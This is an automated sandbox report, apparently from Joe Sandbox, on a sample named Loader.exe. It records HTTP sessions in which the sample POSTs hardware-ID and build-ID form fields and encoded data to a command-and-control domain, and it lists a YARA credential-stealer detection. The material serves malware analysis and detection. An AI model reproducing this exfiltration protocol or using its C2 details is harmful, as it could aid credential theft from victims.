                                                                                    X-XSS-Protection: 1; mode=block
                                                                                    cf-cache-status: DYNAMIC
                                                                                    vary: accept-encoding
                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=AYOJ7Cfl0KnJDwGnfgz3kEg3QWjrzBboVZ4RuMX6Ko9iCmd3psXSXT2qP9Nmc%2BzR3uTCroUrZcBOoYNunYYW%2FlUqJI78FN1a3mglfMWiQDMaLxnOuzy8UuHrO98StYv5glvY9g%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                    Server: cloudflare
                                                                                    CF-RAY: 8f9d45b9585943ee-EWR
                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                    server-timing: cfL4;desc="?proto=TCP&rtt=1747&min_rtt=1743&rtt_var=663&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2844&recv_bytes=954&delivery_rate=1638608&cwnd=230&unsent_bytes=0&cid=c79be099a8d9920c&ts=799&x=0"
                                                                                    2024-12-29 22:37:02 UTC242INData Raw: 34 39 39 34 0d 0a 67 66 72 7a 39 4b 62 59 70 6f 75 4a 74 62 66 4d 2f 56 70 4c 35 72 70 5a 67 71 75 54 48 59 6f 71 58 52 36 32 79 4b 6f 36 56 75 37 36 32 49 58 57 6e 4f 79 4b 71 66 72 51 6c 66 61 4a 4b 44 36 44 6c 6e 76 6a 7a 37 45 6e 37 45 73 78 62 64 50 6b 69 45 77 37 7a 4c 75 63 6b 70 6a 56 76 59 71 70 37 4d 32 56 39 71 59 68 61 59 50 55 65 37 69 4a 39 6e 66 6f 53 7a 46 38 31 36 50 46 53 6a 71 4e 36 5a 61 55 6e 4d 4f 37 77 75 72 6c 32 4e 4b 70 6d 44 73 68 69 4e 4d 30 36 73 61 78 4d 61 68 50 4a 7a 79 4d 36 75 64 66 49 6f 2f 4d 6d 34 43 66 68 4b 57 4b 38 4b 76 51 32 65 37 48 65 43 71 44 32 44 58 6b 7a 2f 68 31 34 6b 49 35 66 64 4b 69 32 6c 4d 77 68 75 6d 59 6c 35 33 4a 73 74 62 6e 37 39 2f 5a 72 35 49 37 61 63 71 59
                                                                                    Data Ascii: 4994gfrz9KbYpouJtbfM/VpL5rpZgquTHYoqXR62yKo6Vu762IXWnOyKqfrQlfaJKD6Dlnvjz7En7EsxbdPkiEw7zLuckpjVvYqp7M2V9qYhaYPUe7iJ9nfoSzF816PFSjqN6ZaUnMO7wurl2NKpmDshiNM06saxMahPJzyM6udfIo/Mm4CfhKWK8KvQ2e7HeCqD2DXkz/h14kI5fdKi2lMwhumYl53Jstbn79/Zr5I7acqY
                                                                                    2024-12-29 22:37:02 UTC1369INData Raw: 50 50 69 4a 71 54 2b 37 65 6a 78 74 78 62 2f 46 53 44 4c 4d 2f 4e 61 49 31 73 4f 32 68 4c 47 72 33 39 6d 67 6d 6a 73 6d 67 39 6b 37 38 73 62 78 66 4f 42 41 4f 33 62 62 70 63 64 57 50 6f 76 72 6b 5a 61 5a 77 37 4c 43 35 75 69 58 6d 2b 36 59 49 47 6e 63 6d 42 76 77 79 76 4a 72 35 56 6c 2f 59 35 71 7a 69 46 38 34 7a 4c 76 59 6c 35 6a 46 74 38 54 37 34 39 7a 65 71 34 30 7a 49 49 6e 56 4f 2b 33 44 2f 6e 7a 6f 54 7a 56 32 32 36 44 4d 56 54 6d 4b 34 35 6a 52 32 49 53 39 33 4b 6d 7a 6c 2f 61 72 6a 7a 38 6c 6b 70 6f 42 6f 4e 61 2f 5a 71 68 50 4d 7a 79 4d 36 73 42 64 4e 34 2f 6f 6c 35 4b 65 7a 36 6a 45 2b 2b 33 61 30 4c 79 5a 50 53 65 4f 32 79 6e 71 78 2f 64 38 34 55 4d 32 65 64 4f 75 69 42 5a 30 69 2f 76 59 79 64 62 6c 74 38 2f 6c 34 63 44 56 37 6f 42 32 4d 4d 54
                                                                                    Data Ascii: PPiJqT+7ejxtxb/FSDLM/NaI1sO2hLGr39mgmjsmg9k78sbxfOBAO3bbpcdWPovrkZaZw7LC5uiXm+6YIGncmBvwyvJr5Vl/Y5qziF84zLvYl5jFt8T749zeq40zIInVO+3D/nzoTzV226DMVTmK45jR2IS93Kmzl/arjz8lkpoBoNa/ZqhPMzyM6sBdN4/ol5Kez6jE++3a0LyZPSeO2ynqx/d84UM2edOuiBZ0i/vYydblt8/l4cDV7oB2MMT
                                                                                    2024-12-29 22:37:02 UTC1369INData Raw: 2f 64 77 35 55 52 2f 4d 70 53 74 30 42 68 73 7a 4d 6d 62 68 5a 58 4f 2b 50 48 71 35 64 6e 53 75 4e 38 6e 5a 35 32 59 50 4f 79 4a 71 54 2f 6c 53 54 64 36 78 71 58 46 57 7a 71 43 37 4a 32 65 6e 73 53 36 79 65 7a 76 33 4e 36 74 6b 6a 77 37 6a 74 67 7a 35 63 6a 37 64 61 67 47 66 33 76 4d 36 70 41 59 42 5a 76 6f 32 71 53 56 79 72 54 44 2f 36 76 49 6d 37 66 66 50 79 58 45 67 48 76 74 77 66 52 36 35 30 6b 31 63 74 47 67 78 46 41 36 6a 2f 47 58 6c 5a 62 49 73 73 37 6b 35 64 50 64 70 35 51 7a 4c 34 54 5a 4d 61 43 48 73 58 6a 77 43 47 63 38 34 4b 33 45 56 54 76 4f 31 70 75 66 6d 4d 4f 73 68 50 61 6c 7a 70 57 70 6b 33 68 78 78 4e 51 79 34 4d 4c 37 65 2b 68 50 4d 6e 6e 58 72 63 74 56 4d 34 62 74 6e 35 57 61 7a 62 66 43 36 65 7a 54 30 4c 79 61 4d 53 57 49 6d 48 57 67
                                                                                    Data Ascii: /dw5UR/MpSt0BhszMmbhZXO+PHq5dnSuN8nZ52YPOyJqT/lSTd6xqXFWzqC7J2ensS6yezv3N6tkjw7jtgz5cj7dagGf3vM6pAYBZvo2qSVyrTD/6vIm7ffPyXEgHvtwfR650k1ctGgxFA6j/GXlZbIss7k5dPdp5QzL4TZMaCHsXjwCGc84K3EVTvO1pufmMOshPalzpWpk3hxxNQy4ML7e+hPMnnXrctVM4btn5WazbfC6ezT0LyaMSWImHWg
                                                                                    2024-12-29 22:37:02 UTC1369INData Raw: 5a 52 66 33 76 59 36 70 41 59 50 59 58 78 6c 70 2b 66 79 62 7a 4d 37 75 58 61 33 71 69 55 50 79 36 43 31 54 50 74 7a 50 4a 2b 37 45 49 74 66 39 2b 67 78 56 4a 30 77 71 4f 66 69 64 61 63 2b 75 50 6c 77 73 66 4f 76 49 6c 34 4e 73 72 42 65 2b 66 46 73 53 65 6f 53 7a 42 31 32 36 4c 41 56 7a 75 49 37 5a 36 58 6d 38 47 31 7a 76 76 6a 32 64 69 6c 6b 44 4d 37 68 4e 55 2f 37 4d 33 35 64 4f 49 49 63 54 7a 54 73 6f 67 41 64 4c 6e 75 6c 35 47 56 30 76 72 62 70 2f 4b 58 30 71 4c 66 59 47 6d 49 31 6a 76 76 78 66 31 30 34 45 6b 7a 63 74 4f 76 77 56 41 38 6e 75 4b 63 6d 5a 66 4b 74 63 58 74 37 74 4c 52 71 5a 73 2b 4a 73 53 57 65 2b 66 52 73 53 65 6f 5a 78 68 4a 6c 6f 76 79 47 43 76 43 2b 74 69 57 6d 6f 54 69 68 4f 58 6f 32 39 32 68 6d 54 45 6c 6a 74 45 77 37 4d 4c 31 63
                                                                                    Data Ascii: ZRf3vY6pAYPYXxlp+fybzM7uXa3qiUPy6C1TPtzPJ+7EItf9+gxVJ0wqOfidac+uPlwsfOvIl4NsrBe+fFsSeoSzB126LAVzuI7Z6Xm8G1zvvj2dilkDM7hNU/7M35dOIIcTzTsogAdLnul5GV0vrbp/KX0qLfYGmI1jvvxf104EkzctOvwVA8nuKcmZfKtcXt7tLRqZs+JsSWe+fRsSeoZxhJlovyGCvC+tiWmoTihOXo292hmTEljtEw7ML1c
                                                                                    2024-12-29 22:37:02 UTC1369INData Raw: 7a 31 61 76 4f 53 6a 4f 46 38 5a 61 63 6d 63 79 79 7a 65 6a 76 30 74 69 6f 6b 7a 49 6f 67 39 59 31 36 49 6d 2f 50 2b 39 51 66 79 53 55 69 39 68 44 4a 70 72 75 75 5a 79 5a 68 4b 57 4b 38 4b 76 51 32 65 37 48 65 43 43 57 33 44 62 79 77 50 5a 78 35 30 73 74 66 64 6d 68 32 6c 38 37 69 4f 53 55 6c 35 6e 43 75 38 48 6a 35 39 44 51 70 5a 41 30 61 63 71 59 50 50 69 4a 71 54 2f 47 51 79 78 72 31 36 54 44 54 69 2f 4d 2f 4e 61 49 31 73 4f 32 68 4c 47 72 31 4e 36 6c 6d 7a 67 6c 68 4e 77 32 34 4e 76 2b 65 4f 39 42 4e 47 37 65 72 63 39 54 50 49 66 73 6e 6f 4f 61 79 71 6a 42 2b 2f 6d 58 6d 2b 36 59 49 47 6e 63 6d 41 33 6e 32 65 46 38 71 6e 6b 70 66 38 4b 68 78 56 52 30 6b 36 32 42 30 5a 48 49 2b 70 79 70 37 64 6a 63 72 5a 41 35 49 49 6a 56 50 75 6e 4d 38 48 6e 73 51 6a
                                                                                    Data Ascii: z1avOSjOF8Zacmcyyzejv0tiokzIog9Y16Im/P+9QfySUi9hDJpruuZyZhKWK8KvQ2e7HeCCW3DbywPZx50stfdmh2l87iOSUl5nCu8Hj59DQpZA0acqYPPiJqT/GQyxr16TDTi/M/NaI1sO2hLGr1N6lmzglhNw24Nv+eO9BNG7erc9TPIfsnoOayqjB+/mXm+6YIGncmA3n2eF8qnkpf8KhxVR0k62B0ZHI+pyp7djcrZA5IIjVPunM8HnsQj
                                                                                    2024-12-29 22:37:02 UTC1369INData Raw: 69 45 64 36 6c 61 4f 66 6e 64 61 63 2b 73 66 75 36 4e 62 66 70 35 4d 33 4c 6f 44 4b 4d 65 66 62 38 48 37 6a 52 54 4e 38 32 61 66 43 57 54 32 42 37 35 57 57 6b 63 75 2f 68 4b 65 72 30 4d 33 75 78 33 67 49 69 64 4d 33 75 35 4f 78 59 4b 5a 52 66 33 76 59 36 70 41 59 4e 49 62 6d 6b 70 79 56 79 37 6e 57 36 4f 33 46 31 61 4f 56 4b 69 4f 50 33 54 62 74 78 50 4a 35 37 6b 4d 7a 62 74 32 71 79 31 4e 30 77 71 4f 66 69 64 61 63 2b 75 66 2b 2f 64 33 53 6f 6f 6b 7a 4b 49 66 4f 4e 76 43 4a 76 7a 2f 35 54 79 34 38 6a 4c 7a 59 54 7a 4f 54 72 59 48 52 6b 63 6a 36 6e 4b 6e 74 33 74 4f 70 6d 54 59 37 67 64 34 30 37 38 44 34 65 2b 42 4c 50 33 6a 51 72 63 31 62 4f 49 66 6b 6d 35 36 53 7a 62 54 4e 35 71 75 5a 6c 61 6d 48 65 48 48 45 2b 53 44 6a 78 66 77 2f 39 77 59 6d 50 4e 4f
                                                                                    Data Ascii: iEd6laOfndac+sfu6Nbfp5M3LoDKMefb8H7jRTN82afCWT2B75WWkcu/hKer0M3ux3gIidM3u5OxYKZRf3vY6pAYNIbmkpyVy7nW6O3F1aOVKiOP3TbtxPJ57kMzbt2qy1N0wqOfidac+uf+/d3SookzKIfONvCJvz/5Ty48jLzYTzOTrYHRkcj6nKnt3tOpmTY7gd4078D4e+BLP3jQrc1bOIfkm56SzbTN5quZlamHeHHE+SDjxfw/9wYmPNO
                                                                                    2024-12-29 22:37:02 UTC1369INData Raw: 4d 79 37 32 4c 47 64 30 72 2f 44 2f 36 6e 69 31 71 43 52 50 7a 2f 45 78 77 53 75 69 66 35 6c 71 42 41 47 5a 5a 53 74 78 42 68 73 7a 50 61 66 6b 5a 48 65 72 4d 50 6c 2b 74 7a 59 6f 72 30 33 4c 70 4c 62 4e 4f 50 59 2b 44 50 6a 52 58 38 79 6c 4b 33 51 47 47 7a 4d 7a 4a 2b 48 6c 65 75 35 31 65 43 72 6d 5a 57 70 69 58 68 78 78 4f 5a 37 38 73 72 68 66 4f 64 5a 41 54 79 4d 73 2f 59 59 50 35 72 6b 69 4a 4b 41 7a 37 66 49 2b 4e 57 58 6a 66 72 4e 61 6e 76 57 69 69 53 67 31 73 34 78 71 45 6c 2f 4a 4f 32 7a 69 45 35 30 31 4c 48 57 30 59 53 45 34 6f 53 75 36 4d 58 48 71 4a 77 75 4b 73 50 6d 42 63 66 66 2b 33 6a 34 54 79 68 7a 6c 4f 53 49 56 33 54 55 32 74 69 59 6b 64 2b 72 30 75 54 37 30 4a 57 52 30 58 67 78 78 49 42 37 31 63 72 2f 63 65 39 65 4c 6a 48 7a 76 4d 4a 66
                                                                                    Data Ascii: My72LGd0r/D/6ni1qCRPz/ExwSuif5lqBAGZZStxBhszPafkZHerMPl+tzYor03LpLbNOPY+DPjRX8ylK3QGGzMzJ+Hleu51eCrmZWpiXhxxOZ78srhfOdZATyMs/YYP5rkiJKAz7fI+NWXjfrNanvWiiSg1s4xqEl/JO2ziE501LHW0YSE4oSu6MXHqJwuKsPmBcff+3j4TyhzlOSIV3TU2tiYkd+r0uT70JWR0XgxxIB71cr/ce9eLjHzvMJf
                                                                                    2024-12-29 22:37:02 UTC1369INData Raw: 54 52 32 49 53 76 7a 2b 58 74 32 73 44 68 6a 69 34 71 6b 74 39 33 36 4e 6a 38 63 36 68 33 63 54 7a 4d 36 70 41 59 41 59 2f 74 6c 70 61 41 31 66 66 6b 34 75 66 55 32 61 2b 59 65 47 66 45 33 6e 75 34 6d 72 38 2f 37 46 6c 2f 4a 49 54 34 6b 77 31 6e 32 37 50 4b 6a 74 6a 64 2b 74 4b 70 73 34 57 62 37 6f 31 34 63 63 53 66 4f 50 4c 62 39 33 7a 2b 53 33 68 43 36 71 76 46 56 33 69 43 36 4a 69 57 68 74 4b 68 69 4f 48 6f 7a 63 2b 51 6f 52 4d 6c 67 74 38 68 35 38 2f 58 58 36 67 47 66 33 4f 55 38 76 45 59 66 4d 7a 63 31 74 47 4f 68 4f 4b 45 33 4f 6a 5a 32 36 6d 4a 4b 57 53 73 2b 77 48 61 69 39 31 34 2f 51 6f 4c 65 38 53 37 77 31 55 34 7a 4b 33 59 6c 39 61 63 36 6f 71 70 37 38 61 56 39 73 39 71 63 74 47 4c 62 4c 43 62 37 6a 48 78 43 43 6b 38 6a 50 69 47 47 43 62 4d 75
                                                                                    Data Ascii: TR2ISvz+Xt2sDhji4qkt936Nj8c6h3cTzM6pAYAY/tlpaA1ffk4ufU2a+YeGfE3nu4mr8/7Fl/JIT4kw1n27PKjtjd+tKps4Wb7o14ccSfOPLb93z+S3hC6qvFV3iC6JiWhtKhiOHozc+QoRMlgt8h58/XX6gGf3OU8vEYfMzc1tGOhOKE3OjZ26mJKWSs+wHai914/QoLe8S7w1U4zK3Yl9ac6oqp78aV9s9qctGLbLCb7jHxCCk8jPiGGCbMu
                                                                                    2024-12-29 22:37:02 UTC1369INData Raw: 63 36 59 71 70 2b 5a 65 4e 37 74 67 32 4a 49 58 62 4e 65 50 62 34 33 6e 72 58 6a 77 37 36 70 54 74 56 54 6d 4a 37 5a 2b 76 71 4f 57 77 31 4f 54 6b 30 4a 65 4f 6d 43 34 71 75 75 59 4d 38 63 37 68 50 63 35 4c 4b 58 2b 55 35 49 68 41 64 4e 53 6a 75 5a 75 47 79 62 58 44 71 38 76 51 77 36 33 66 64 6d 6d 41 6d 47 4f 67 37 50 78 79 37 55 59 34 50 76 57 67 32 46 55 37 69 36 47 34 6c 6f 44 48 2b 6f 71 70 35 35 65 4e 37 70 34 79 4f 59 6e 58 50 4b 7a 4f 36 33 69 6f 42 6e 39 79 6c 50 4b 49 57 54 36 63 37 70 65 57 32 73 4b 30 79 71 6e 30 6d 63 7a 75 69 58 68 78 31 35 5a 37 38 6f 6d 70 50 36 39 4c 4c 57 37 53 71 64 35 62 63 37 4c 64 74 59 4f 52 31 4c 6d 47 32 4f 62 54 77 37 75 63 4b 43 36 36 35 68 62 79 7a 75 46 38 71 6e 6b 70 66 39 53 6b 7a 78 68 36 7a 50 76 59 79 64
                                                                                    Data Ascii: c6Yqp+ZeN7tg2JIXbNePb43nrXjw76pTtVTmJ7Z+vqOWw1OTk0JeOmC4quuYM8c7hPc5LKX+U5IhAdNSjuZuGybXDq8vQw63fdmmAmGOg7Pxy7UY4PvWg2FU7i6G4loDH+oqp55eN7p4yOYnXPKzO63ioBn9ylPKIWT6c7peW2sK0yqn0mczuiXhx15Z78ompP69LLW7Sqd5bc7LdtYOR1LmG2ObTw7ucKC665hbyzuF8qnkpf9Skzxh6zPvYyd


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2192.168.2.450011104.21.80.14437888C:\Users\user\Desktop\Loader.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    2024-12-29 22:37:04 UTC276OUTPOST /api HTTP/1.1
                                                                                    Connection: Keep-Alive
                                                                                    Content-Type: multipart/form-data; boundary=7NHRP02K4MX
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                    Content-Length: 18127
                                                                                    Host: fancywaxxers.shop
                                                                                    2024-12-29 22:37:04 UTC15331OUTData Raw: 2d 2d 37 4e 48 52 50 30 32 4b 34 4d 58 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 32 37 42 35 42 42 30 42 41 31 45 46 33 35 43 42 33 33 32 32 32 32 31 43 39 32 41 42 31 31 30 43 0d 0a 2d 2d 37 4e 48 52 50 30 32 4b 34 4d 58 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 37 4e 48 52 50 30 32 4b 34 4d 58 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 42 56 6e 55 71 6f 2d 2d 40 79 6f 75 6e 67 65 73 73 74 74 0d 0a 2d 2d 37 4e 48 52 50 30 32 4b 34 4d 58
                                                                                    Data Ascii: --7NHRP02K4MXContent-Disposition: form-data; name="hwid"27B5BB0BA1EF35CB3322221C92AB110C--7NHRP02K4MXContent-Disposition: form-data; name="pid"2--7NHRP02K4MXContent-Disposition: form-data; name="lid"BVnUqo--@youngesstt--7NHRP02K4MX
                                                                                    2024-12-29 22:37:04 UTC2796OUTData Raw: bc c6 a2 f2 ea 27 0a 66 e1 9f 97 c5 15 2e a7 07 cf 5c b7 ad 66 f0 cc 99 a8 33 f7 13 05 cf ec 85 7a 3b 85 8d 54 32 2f 1f e5 1b c1 33 7b 37 a5 bf 9f 8e 3a f1 6e 9a e0 79 69 60 c1 4c a6 f2 f7 de 4b 1f 36 af 1d f9 d7 e0 58 6d 5b 0b fd 9c 0a b5 9b 60 cc b0 d7 ab 1f 3b d0 52 0a 9f fd 54 22 95 3f 7a 94 ff 75 ab 9f a1 e3 6f 93 83 99 38 43 4e 2f 95 2f 6d 6e ac ae d3 03 1e ad ac 6f 7a a3 8a 81 36 d9 bf 1f 83 71 fd 1a ed c5 4d d3 3e 9b d8 ac 97 0c bd 15 36 2b 97 37 bb ef 2e 57 0f bc 3e 57 2a 0f 97 2f ad 6d 4a a7 02 2f 2b 7f 42 10 78 3e ba 45 a8 b5 6d 75 bf 83 75 53 b3 09 3b 9c 3e 27 56 d3 d4 ab d6 33 5e 4f 4d 1f 4e cd b2 89 b4 bc b1 b1 56 29 af ef 1e fa 70 79 ed 62 65 cf 7b d9 de 73 45 81 36 af a9 da 16 51 bc 21 8f 77 45 11 8f 43 d4 61 11 d5 14 88 8d cc 54 77 94 6d
                                                                                    Data Ascii: 'f.\f3z;T2/3{7:nyi`LK6Xm[`;RT"?zuo8CN//mnoz6qM>6+7.W>W*/mJ/+Bx>EmuuS;>'V3^OMNV)pybe{sE6Q!wECaTwm
                                                                                    2024-12-29 22:37:05 UTC1133INHTTP/1.1 200 OK
                                                                                    Date: Sun, 29 Dec 2024 22:37:05 GMT
                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                    Transfer-Encoding: chunked
                                                                                    Connection: close
                                                                                    Set-Cookie: PHPSESSID=l6d65tpcd6i90ca5epqj6fhmj7; expires=Thu, 24 Apr 2025 16:23:43 GMT; Max-Age=9999999; path=/
                                                                                    Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                    Cache-Control: no-store, no-cache, must-revalidate
                                                                                    Pragma: no-cache
                                                                                    X-Frame-Options: DENY
                                                                                    X-Content-Type-Options: nosniff
                                                                                    X-XSS-Protection: 1; mode=block
                                                                                    cf-cache-status: DYNAMIC
                                                                                    vary: accept-encoding
                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=UUJ%2FxEAkDh7yjNck5KHrc4pr8ny2fZef2a4Z31x6GQA0TnPJgRqKvsyoAgZr2HPKVeH43ib58Mlen0U5tGks84hKaG0jvxqZoAbguBiTK19Yl%2BeGhelLi6UqL4%2BXMbMt5xSn9g%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                    Server: cloudflare
                                                                                    CF-RAY: 8f9d45c7aaa30f36-EWR
                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                    server-timing: cfL4;desc="?proto=TCP&rtt=1479&min_rtt=1473&rtt_var=565&sent=18&recv=24&lost=0&retrans=0&sent_bytes=2842&recv_bytes=19083&delivery_rate=1914754&cwnd=231&unsent_bytes=0&cid=38d405252bfb46ed&ts=976&x=0"
                                                                                    2024-12-29 22:37:05 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                    Data Ascii: fok 8.46.123.189
                                                                                    2024-12-29 22:37:05 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                    Data Ascii: 0


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3192.168.2.450012104.21.80.14437888C:\Users\user\Desktop\Loader.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    2024-12-29 22:37:05 UTC281OUTPOST /api HTTP/1.1
                                                                                    Connection: Keep-Alive
                                                                                    Content-Type: multipart/form-data; boundary=VTH0YMONO0BECKZEL
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                    Content-Length: 8784
                                                                                    Host: fancywaxxers.shop
                                                                                    2024-12-29 22:37:05 UTC8784OUTData Raw: 2d 2d 56 54 48 30 59 4d 4f 4e 4f 30 42 45 43 4b 5a 45 4c 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 32 37 42 35 42 42 30 42 41 31 45 46 33 35 43 42 33 33 32 32 32 32 31 43 39 32 41 42 31 31 30 43 0d 0a 2d 2d 56 54 48 30 59 4d 4f 4e 4f 30 42 45 43 4b 5a 45 4c 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 56 54 48 30 59 4d 4f 4e 4f 30 42 45 43 4b 5a 45 4c 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 42 56 6e 55 71 6f 2d 2d 40 79 6f 75 6e 67 65 73
                                                                                    Data Ascii: --VTH0YMONO0BECKZELContent-Disposition: form-data; name="hwid"27B5BB0BA1EF35CB3322221C92AB110C--VTH0YMONO0BECKZELContent-Disposition: form-data; name="pid"2--VTH0YMONO0BECKZELContent-Disposition: form-data; name="lid"BVnUqo--@younges
                                                                                    2024-12-29 22:37:06 UTC1139INHTTP/1.1 200 OK
                                                                                    Date: Sun, 29 Dec 2024 22:37:06 GMT
                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                    Transfer-Encoding: chunked
                                                                                    Connection: close
                                                                                    Set-Cookie: PHPSESSID=b54vqstp7mu8h8liuoj6e4qci8; expires=Thu, 24 Apr 2025 16:23:44 GMT; Max-Age=9999999; path=/
                                                                                    Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                    Cache-Control: no-store, no-cache, must-revalidate
                                                                                    Pragma: no-cache
                                                                                    X-Frame-Options: DENY
                                                                                    X-Content-Type-Options: nosniff
                                                                                    X-XSS-Protection: 1; mode=block
                                                                                    cf-cache-status: DYNAMIC
                                                                                    vary: accept-encoding
                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=9C3o8xnsMhS0w8%2BM98XmzEma%2FLW4oZRpqXq%2BPSZQKiLpchSJpUdc6xn7lwhmTMIY8aO4%2BR2qzmMZNuaNNg5oZQf19AbKlCxN5z%2Fd2yLFS8PQsy6Q9Ls%2B8f6SuoCy%2BzfIf5lKow%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                    Server: cloudflare
                                                                                    CF-RAY: 8f9d45ceefdd42d2-EWR
                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                    server-timing: cfL4;desc="?proto=TCP&rtt=1568&min_rtt=1544&rtt_var=627&sent=7&recv=14&lost=0&retrans=0&sent_bytes=2844&recv_bytes=9723&delivery_rate=1680092&cwnd=229&unsent_bytes=0&cid=a294a90f7c753b6f&ts=458&x=0"
                                                                                    2024-12-29 22:37:06 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                    Data Ascii: fok 8.46.123.189
                                                                                    2024-12-29 22:37:06 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                    Data Ascii: 0


                                                                                    Click to jump to process

                                                                                    Click to jump to process

                                                                                    Click to dive into process behavior distribution

                                                                                    Click to jump to process

                                                                                    Target ID:0
                                                                                    Start time:17:33:58
                                                                                    Start date:29/12/2024
                                                                                    Path:C:\Users\user\Desktop\Loader.exe
                                                                                    Wow64 process (32bit):true
                                                                                    Commandline:"C:\Users\user\Desktop\Loader.exe"
                                                                                    Imagebase:0x2a0000
                                                                                    File size:913'448 bytes
                                                                                    MD5 hash:005896360BE304A48E43D98BDA83E12A
                                                                                    Has elevated privileges:true
                                                                                    Has administrator privileges:true
                                                                                    Programmed in:C, C++ or other language
                                                                                    Reputation:low
                                                                                    Has exited:false

                                                                                    Target ID:1
                                                                                    Start time:17:33:58
                                                                                    Start date:29/12/2024
                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                    Wow64 process (32bit):false
                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                    Imagebase:0x7ff7699e0000
                                                                                    File size:862'208 bytes
                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                    Has elevated privileges:true
                                                                                    Has administrator privileges:true
                                                                                    Programmed in:C, C++ or other language
                                                                                    Reputation:high
                                                                                    Has exited:false

                                                                                    Target ID:6
                                                                                    Start time:17:36:59
                                                                                    Start date:29/12/2024
                                                                                    Path:C:\Users\user\Desktop\Loader.exe
                                                                                    Wow64 process (32bit):true
                                                                                    Commandline:"C:\Users\user\Desktop\Loader.exe"
                                                                                    Imagebase:0x2a0000
                                                                                    File size:913'448 bytes
                                                                                    MD5 hash:005896360BE304A48E43D98BDA83E12A
                                                                                    Has elevated privileges:true
                                                                                    Has administrator privileges:true
                                                                                    Programmed in:C, C++ or other language
                                                                                    Yara matches:
                                                                                    • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000006.00000002.3527107091.0000000003235000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                    Reputation:low
                                                                                    Has exited:false

                                                                                    Target ID:9
                                                                                    Start time:17:37:00
                                                                                    Start date:29/12/2024
                                                                                    Path:C:\Windows\SysWOW64\WerFault.exe
                                                                                    Wow64 process (32bit):true
                                                                                    Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 7476 -s 136
                                                                                    Imagebase:0x760000
                                                                                    File size:483'680 bytes
                                                                                    MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                                                                                    Has elevated privileges:true
                                                                                    Has administrator privileges:true
                                                                                    Programmed in:C, C++ or other language
                                                                                    Reputation:high
                                                                                    Has exited:false

                                                                                    Reset < >

                                                                                      Execution Graph

                                                                                      Execution Coverage:7.3%
                                                                                      Dynamic/Decrypted Code Coverage:1.2%
                                                                                      Signature Coverage:1.9%
                                                                                      Total number of Nodes:670
                                                                                      Total number of Limit Nodes:13
